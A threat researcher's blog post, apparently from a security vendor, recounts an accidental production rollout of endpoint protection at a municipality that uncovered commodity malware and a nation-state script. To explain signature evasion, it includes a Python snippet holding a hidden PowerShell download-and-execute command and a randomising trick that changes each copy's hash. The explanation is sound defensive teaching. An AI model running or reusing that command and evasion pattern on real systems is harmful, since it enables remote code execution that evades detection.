As a threat researcher, I’ve advised security teams of organizations big and small, across both public and private sectors. So after a decade in DFIR, people often ask me about the craziest or most interesting things I’ve seen on client networks. I have quite a few interesting stories under my belt, from state and local governments, to startups, and large enterprises. I’m excited to share a few of these ‘Tales from the SOC’ with the larger cybersecurity community.
First up? The municipality.
Sometimes a customer is so enthusiastic about using a new technology that they jump in with both feet – often with interesting results. Case in point: a municipality that inadvertently deployed a brand-new endpoint protection technology across a small part of their production network.
Like most municipalities, this one had a wide variety of unusual and questionable software products running on endpoints in their environment. And while I wasn’t surprised to see the usual cast of characters – such as Emotet, TrickBot and an impressive spectrum of browser-resident malware – we also found an infection that stood out, and which we associated with a nation-state threat group.
What made this case even more interesting is that it happened in an obscure and relatively unknown IT group that is part of a sprawling municipality. Despite their low profile, the group is entrusted with a great deal of responsibility and was ultimately the target of a nation-state attack that went undetected for six months.
Their network includes hundreds of thousands of endpoints. Without any prior notice, they deployed an entirely new platform across a subset of a thousand production systems. Yes, the actual live environment that they use every day. Normally, analysts perform tests on lab networks with virtual machines, but this was the real deal.
The lead at the municipality was probably a little too eager to see what else the technology could do to protect their network, and he mistakenly set up an automated installation job. By the time he realized what had happened, he decided to keep the software on those thousand or so systems and see what could be learned from it.
Our challenge: immediate threat response
Enthusiasm can be a blessing or a curse, depending on your perspective. To me it was a little of both: a great opportunity to showcase practical applications under the least convenient circumstances. Whatever margin for error existed before was now gone, and this was probably one of the biggest challenges we had faced in a customer trial. Teams responsible for threat detection know that moment when only a few seconds pass and somehow everything in front of them has changed.
As veterans of incident response and security operations, the team and I stepped into familiar and comfortable roles as we escalated things to our customer. They authorized the team to dig, and we took advantage of the technology already in place to begin our excavation and share findings.
Of course, once these systems were activated, we started receiving telemetry from them in our SOC which included all manner of events. They approached the configuration of the sensor with as much enthusiasm as they used in deploying it, and turned on every feature in prevention mode. Typically, we tune the platform for each SOC’s environment for a few days, but in this case our first notice was an unusual variety and volume of alerts.
We quickly realized that we were looking at a production environment because these alerts were showing things that normally aren’t on test systems or in lab simulations, such as complex and legitimate administrative tasks related to software management, multiple browser toolbars with adware, freeware screensavers, and other indications of patterns of behavior that appeared to be actual human beings on production systems.
From this early deployment, we immediately found more than 100 systems containing malware, or around 14 percent of the total population. Although most of the threats we found were best described as nuisances (and a small number could self-propagate, creating a more costly cleanup effort), none of these types of threats were new or terribly novel. This discovery came as something of a surprise to the IT staffers, because they had been using a traditional AV solution for many years and had never received any notification of these issues.
But not everything that we found could be easily addressed by antivirus software, most notably the state-sponsored sample, which we confirmed had gone undetected on one endpoint for several months. This increased the pressure on everyone: a persistently infected system had sat in the enterprise for some time before we could deploy technology and gain real-time visibility. We also had a series of investigative questions to answer with only a very small percentage of the production deployment complete. We have all read about various intrusions in the news, and we couldn’t help but think of the headlines. The customer needed us to move fast, collect and preserve evidence, and help them understand whether this was just the tip of the incident iceberg.
Understanding Windows scripting attacks
We found the persistence mechanism for a script that would run periodically as a scheduled task – something we quickly confirmed wasn’t currently running. Scripts are a challenge for signature- or classifier-based solutions because they are incredibly malleable and because much of their behavior mimics a legitimate Windows user and software. An adversary can create thousands of unique variations of a script without losing any functionality, and many free obfuscation tools are available. For these reasons it is quite easy to evade a signature or perturb a machine-learning model.
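The malleability point is easy to demonstrate. Here is a minimal sketch, in Python, of why byte-level signatures struggle with scripts: the payload string below is a hypothetical scripted downloader, not the actual sample from this investigation, and the obfuscation shown (padding the command with a random no-op variable assignment) is just one of the simplest tricks an adversary or a free obfuscation tool might apply.

```python
import hashlib
import random
import string

# Hypothetical scripted downloader command, for illustration only.
SCRIPT = 'powershell -NoP -W Hidden -c "IEX (New-Object Net.WebClient).DownloadString($u)"'

def obfuscate(script: str) -> str:
    """Prepend a harmless, randomly named variable assignment inside the
    command. Functionality is unchanged, but the bytes (and therefore any
    hash- or string-based signature) differ on every run."""
    var = "$" + "".join(random.choices(string.ascii_letters, k=8))
    junk = f"{var} = {random.randint(0, 9999)}; "
    return script.replace('-c "', f'-c "{junk}', 1)

# Generate 1,000 variants and count how many distinct SHA-256 hashes result.
hashes = {hashlib.sha256(obfuscate(SCRIPT).encode()).hexdigest() for _ in range(1000)}
print(len(hashes))
```

Nearly all 1,000 variants hash differently while behaving identically, which is why behavioral telemetry (what the script spawns, connects to, and persists as) tends to hold up better against this class of threat than static signatures do.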
Traditional enterprise AV solutions definitely have their place, and signatures can be effective against broad classes of threats as well as certain malicious tools that are still widely used but rarely change. This threat was familiar to me: not only had I investigated the technique many times and developed dozens of analytics for its variations, I had even used the technique myself, many times.
On its own, you might see these techniques being used by threat actors with all degrees of maturity and motivations. This specific payload, however, had been previously described in public reporting on Russian nation-state activity – and that detail gave us pause.
The reasons for targeting this organization and this business unit weren’t obvious to us, especially since we couldn’t find any information about its responsibilities or personnel in open sources. We do know that these payloads are rarely, if ever, installed accidentally.
All of the systems compromised by this attack were in a business unit that was very much under the radar: it has no public webpage, it isn’t known to the outside public, and you can’t easily find its employees on LinkedIn. The unit is a small group of internal auditors buried within the overall IT infrastructure, making them an interesting target.
Because this was a municipal organization, we also found issues with non-PC endpoints: the customer runs utilities equipment in addition to the usual Windows PCs, creating a complex management infrastructure.
How we responded
Given the results of the initial deployment, one of our jobs was to train the customer’s IT staff to understand what they were seeing, how we came to our conclusions, and how to identify future compromises to their systems. Importantly, teaching customers how to identify the history and motivations behind an attack before remediation action is taken allows them to preserve evidence and focus their defenses to improve future protections.
We were able to train the customer to triage their alerts and understand the severity of various attacker techniques. It’s worth noting that this customer’s total security staff was very small: just a dozen people responsible for various tasks, despite operating within an IT department with hundreds of staffers, supplemented by a number of third-party contractors and partners. That meant we had to ensure the team was fully educated on what to look for to detect threats most effectively. Part of the challenge in this kind of deployment is that the staff often doesn’t know the right questions to ask to determine whether they have been compromised, and it can take years before they are fully self-sufficient. It’s important to implement platforms that minimize the learning curve so that less experienced analysts are set up for immediate success.
Even though we started out with a surprise production deployment, we still ended up with a successful engagement and the customer came out looking like a hero, since they now know how to protect their systems against future attacks and what to look for in future scans.
Here are some of the lessons learned from this deployment:
• Never assume that when you find an alert that it is the first or even only event on that endpoint; you have to dig deeper to get the full picture.
• Training is essential: finding malware is just the first step and understanding how to find future malware is even more important.
• If you are going to evaluate a security solution using virtual machines or other simulated environments, understand that you will still have a very different endpoint population than your actual environment.
• Size doesn’t matter. No matter how big or small your IT team may be, or the overall business revenues, you have to be prepared for a breach. While the big companies like Target and Marriott get the headlines, those same adversaries can be found in even unlikely places such as at this small department within a municipal IT organization.